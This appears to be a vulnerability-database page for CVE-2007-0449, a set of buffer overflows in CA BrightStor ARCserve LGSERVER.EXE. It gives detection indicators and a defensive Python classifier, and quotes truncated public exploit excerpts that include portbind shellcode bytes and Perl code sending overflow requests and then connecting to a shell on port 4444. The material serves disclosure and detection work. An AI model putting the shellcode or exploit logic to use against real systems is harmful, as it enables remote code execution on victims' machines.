CVE-2007-0449
Published 2007-01-23
Priority: P2 (68) · Severity: critical · CVSS 2.0 base score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: public exploit code available
EPSS: 79.24% (99.6th percentile)
Multiple buffer overflows in LGSERVER.EXE in CA BrightStor ARCserve Backup for Laptops and Desktops r11.0 through r11.1 SP1, Mobile Backup r4.0, Desktop and Business Protection Suite r2, and Desktop Management Suite (DMS) r11.0 and r11.1 allow remote attackers to execute arbitrary code via crafted packets to TCP port (1) 1900 or (2) 2200.
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| broadcom | brightstor_arcserve_backup_laptops_desktops | — | — |
| broadcom | brightstor_arcserve_backup_laptops_desktops | — | — |
| broadcom | brightstor_mobile_backup | — | — |
| broadcom | business_protection_suite | — | — |
| broadcom | desktop_management_suite | — | — |
| broadcom | desktop_management_suite | — | — |
| broadcom | desktop_protection_suite | — | — |
Detection & IOCs (extracted from sources)
- Detect exploit attempts against LGSERVER.EXE by monitoring for large crafted TCP connections to port 1900 or 2200 containing an initial 10-byte numeric prefix (e.g. '0000033000' or '0000016705') followed by a long NOP sled (~2322 bytes).
- Alert on TCP connections to port 1900 or 2200 targeting LGSERVER.EXE where the payload length significantly exceeds normal protocol bounds, indicative of a stack buffer overflow attempt.
- Monitor for outbound connections to TCP port 4444 from the LGSERVER.EXE process, which is the port bound by the exploit's portbind shellcode.
- The Metasploit module uses bad character filtering of '\x00\x0a\x0d\x5c\x5f\x2f\x2e' in the payload; network signatures should look for large payloads to port 1900 that avoid these bytes.
- The SEH-based exploit appends '\x58' * 0x4141 after the SEH overwrite; look for this pattern in TCP streams to port 1900.
- The return address 0x75022ac4 is specific to Windows 2000 Pro English All; exploitability and ROP/SEH gadget addresses will differ on other OS versions.
- The Metasploit module targets CA BrightStor ARCserve Backup for Laptops & Desktops 11.1 specifically; other versions in the affected range (r11.0–r11.1 SP1, Mobile Backup r4.0, DMS r11.0/r11.1) may require different offsets.
- The exploit payload space is limited to 600 bytes and requires a stack adjustment of -3500; payloads exceeding this space or lacking the adjustment will fail.
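As an added defensive example (not code from this page's sources or from the exploit modules below), a small Python classifier that applies the indicators listed above to captured TCP payloads. The thresholds, the reading of the 10-digit prefix as a declared length, and the sample streams are assumptions constructed for illustration.

```python
import re

# Ports the advisory names for LGSERVER.EXE (from the CVE text).
LGSERVER_PORTS = {1900, 2200}
# Thresholds below are assumptions chosen for this example, not protocol facts.
MAX_SANE_LEN = 1024      # a request longer than this is treated as out of bounds
NOP_SLED_MIN = 256       # contiguous 0x90 bytes needed to call it a sled
SEH_FILLER_MIN = 1024    # contiguous 0x58 ('X') bytes, as appended after an SEH overwrite

NOP_SLED_RE = re.compile(rb"\x90{%d,}" % NOP_SLED_MIN)
SEH_FILLER_RE = re.compile(rb"\x58{%d,}" % SEH_FILLER_MIN)

def classify_payload(dst_port: int, payload: bytes) -> list[str]:
    """Return the indicators matched by one TCP stream sent to LGSERVER."""
    reasons = []
    if dst_port not in LGSERVER_PORTS:
        return reasons
    if len(payload) > MAX_SANE_LEN:
        reasons.append("oversized_payload")
    prefix = payload[:10]
    # The public exploits send a 10-digit ASCII number first ('0000033000',
    # '0000016705'); treating it as a declared length is an assumption here.
    if len(prefix) == 10 and prefix.isdigit() and int(prefix) > MAX_SANE_LEN:
        reasons.append("large_numeric_prefix")
    if NOP_SLED_RE.search(payload, 10):
        reasons.append("nop_sled")
    if SEH_FILLER_RE.search(payload):
        reasons.append("seh_filler_0x58")
    return reasons

def is_alert(reasons: list[str]) -> bool:
    """Alert on a NOP sled alone, or on any two indicators together."""
    return "nop_sled" in reasons or len(reasons) >= 2

# Constructed sample streams (not real captures): a small request, a
# sled-style overflow attempt, an SEH-style attempt with 0x4141 'X' bytes,
# and the same sled sent to an unrelated port.
SAMPLES = {
    "benign": (1900, b"0000000016" + b"hello lgserver!!"),
    "sled":   (1900, b"0000033000" + b"\x90" * 2322 + b"B" * 600),
    "seh":    (2200, b"0000016705" + b"A" * 100 + b"\x58" * 0x4141),
    "other":  (8080, b"0000033000" + b"\x90" * 2322),
}

if __name__ == "__main__":
    for name, (port, data) in SAMPLES.items():
        r = classify_payload(port, data)
        print(f"{name:6s} port={port} len={len(data):6d} alert={is_alert(r)} {r}")
```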
No detection rules found.
Exploit-DB
CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (1)
exploitdb · 2010-05-09 · CVE-2007-0449
---
```ruby
##
# $Id: lgserver.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could
overflow the buffer and execute arbitrary code.
},
'Author' => [
```
Exploit-DB
CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow
exploitdb · 2007-02-01 · CVE-2007-0449
---
```python
#!/usr/bin/python
# Remote exploit for the CA BrightStor Arcserve stack overflow as
# described in http://www.securityfocus.com/archive/1/458648/30/0/threaded
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
#
import os
import sys
import socket
import struct
#Portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54
```
Exploit-DB
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
exploitdb · 2007-01-28 · CVE-2007-0449
---
```perl
#!/usr/bin/perl
#
# original exploit by lssec.com this is a perl porting
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
$request = $uuid;
send $socket, $request, 0;
print "[+] Sent uuid request\n";
recv($socket, $reply, 1024, 0);
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 1st request\n";
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 2nd request\n";
print " + Connect on 4444 port of $host ...\n";
sleep(3);
system("telnet
```
Exploit-DB
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)
exploitdb · 2007-01-27 · CVE-2007-0449
---
```python
#!/usr/bin/python
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc impor
```
Metasploit
CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/23897
- http://securitytracker.com/id?1017548
- http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp
- http://www.kb.cert.org/vuls/id/357308
- http://www.kb.cert.org/vuls/id/611276
- http://www.osvdb.org/31593
- http://www.securityfocus.com/archive/1/457945/30/8460/threaded
- http://www.securityfocus.com/archive/1/458644/100/0/threaded
- http://www.securityfocus.com/archive/1/458648/100/0/threaded
- http://www.securityfocus.com/bid/22199
- http://www.securityfocus.com/bid/22340
- http://www.securityfocus.com/bid/22342
- http://www.vupen.com/english/advisories/2007/0314
- http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696
- http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993
- https://exchange.xforce.ibmcloud.com/vulnerabilities/31704